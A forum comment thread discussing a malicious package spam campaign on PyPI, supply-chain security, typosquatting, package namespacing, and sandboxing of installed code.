It's not an attack "on" PyPI, or even an attack at all: someone is just spamming the index with packages. There's no evidence that these packages are being downloaded by anyone at all, or that the person in question has made any serious effort to conceal their attentions (it's all stuffed in the setup script without any obfuscation, as the post says). The executable in question isn't even served through PyPI (for reasons that are unclear to me): it's downloaded by the dropper script. Ironically, serving the binary directly would probably raise fewer red flags.
Supply chain security is important; we should reserve phrases like "aggressive attack" for things that aren't script kiddie spam.
Lol, maybe, "chatgpt, give me a thousand feasible pypi package names"?
And in this way, malicious packages may be unintentionally downloaded by users even when those malicious packages did not yet exist when the LLM was trained. Just because the hallucinated package name was randomly later taken by someone malicious.
I wrote a comment on the NPM thread earlier (https://news.ycombinator.com/threads?id=freeqaz) that I'll quote here:
> "While being flooded with spam is never good, it gets immediately noticed and mitigated. It's harder for open source projects to spot and stop rare one-offs"
This is the real problem that NPM and other ecosystems face. A determined attacker that is trying to "poison" a popular Open Source package just has to feign as a maintainer long enough to succeed[0]. Defeating these types of attacks will require rethinking how we think about trust of packages.
Projects like Deno are one approach (fork the ecosystem) while projects like Packj (mentioned elsewhere here), Socket.dev, and LunaTrace[1] are taking the other angle (make it harder to install malware).
It's hard to say which approach is better right away. (Probably a hybrid of both, realistically) It's just non-trivial to fix this in one clean swoop. It's messy.
0: https://www.trendmicro.com/vinfo/us/security/news/cybercrime...
There's something beautiful in knowing you're using pure, clean Python. Much easier to install, also.
Attacking a popular repository like this does not have to have a high hit rate.
"Script kiddie spam" is now computers get compromised. Unsophisticated mass attack.
This sport of thing, combined with woeful security and fragile systems are causing havoc the world over.
It doesn't make plain Python code you blindly execute any safer, but at least you've explicitly given those packages your trust. I believe this is more geared toward detecting compromises of those packages you have given that trust.
Python used to have a "batteries included" philosophy which tried to put most important stuff into the distro, reducing the number of external dependencies any given app needed. They seem to have abandoned that now, leaving us to fend for ourselves against the malware.
NPM spam: https://www.scmagazine.com/analysis/devops/npm-repository-15...
Yes, along with reducing the stdlib and directing us to PyPI for "alternatives".
The closest thing is pattern/AST matching on the package's source, but trivial obfuscation defeats that. There's also no requirement that a package on PyPI is even uploaded with source (binary wheel-only packages are perfectly acceptable).
This is a little bit too strong, since packaging doesn't require arbitrary code execution. For example, Go doesn't permit arbitrary code execution during `go get`. Now - there have been bugs which permit code execution (like https://github.com/golang/go/issues/22125) but they are treated as security vulnerabilities and bugs.
Of course, you're right about Python.
Java's type system: ClassLoaders plus SecurityManager was impossible?
that's literally how Java applets worked, enforced through the type system
https://docstore.mik.ua/orelly/java-ent/security/ch03_01.htm
yes, SecurityManager was a poor implementation for many reasons, but it's definitely not "impossible" to sandbox downloaded code from the network while having it interact with other existing code, you can do it with typing alone
I worked a few years back on something like this but it went nowhere, but I still believe it would be doable and useful. The only trace I found back is https://wiki.python.org/moin/Testing%20Infrastructure, which contains almost no info...
Maven sorted this out 20 years ago
what's a bit sad is the python packaging's authority survey from a few months ago seemed to be mostly interested in vision and mission statements
rather that building a functional set of tools
(This is not a reason not to add namespacing; just an observation that it's mostly irrelevant to contexts like this.)
example: the package named "aws" on pypi was created by some random guy and has been abandoned for years
if pypi/pip supported namespacing that would be info.randomdude.aws instead
and amazon's packages would be under com.amazon
not being able to namespace internal packages is another security issue that is substantially improved with proper namespacing
to be blunt: not supporting it at this point is reckless and irresponsible
(I note you're part of pypa!)
Maybe the list can be hosted on an internal server for other employees to reuse. Hosting all the packages internally is overkill. Trusting the world by default is overkill.
Now "pip install gooogle/package"
"Hey User, gooogle/package is not from a trusted namespace. Did you mean google/package which is similar and trusted? Or would you like to add gooogle to your local trust file?"
The lack of any kind of curated feeds that only lists verified or popular packges is tragedy. There should be a reasonable way of allowing clients to protect themselves from a typo.
Good namespacing (e.g. in Go), in practice, provides critical context about the development/publication of a software package.
But deliver anything more streamlined and secure? Hell, no!
https://journals.plos.org/plosone/article?id=10.1371/journal...
It's like NYC's side walks. Compare pedestrian behavior at say SoHo (daylight) and say LES (nighttime). Amazingly enough, the partying and inebrieted pedestrians at night all file politely in the correct bimodal L|R formation. During the day, it's a rather wild and somewhat uncivilized dynamic slalom formation. My theory: Fangs. The night creatures know someone potentially dangerous maybe in the midst.
In these cases I frankly assume that they don't either.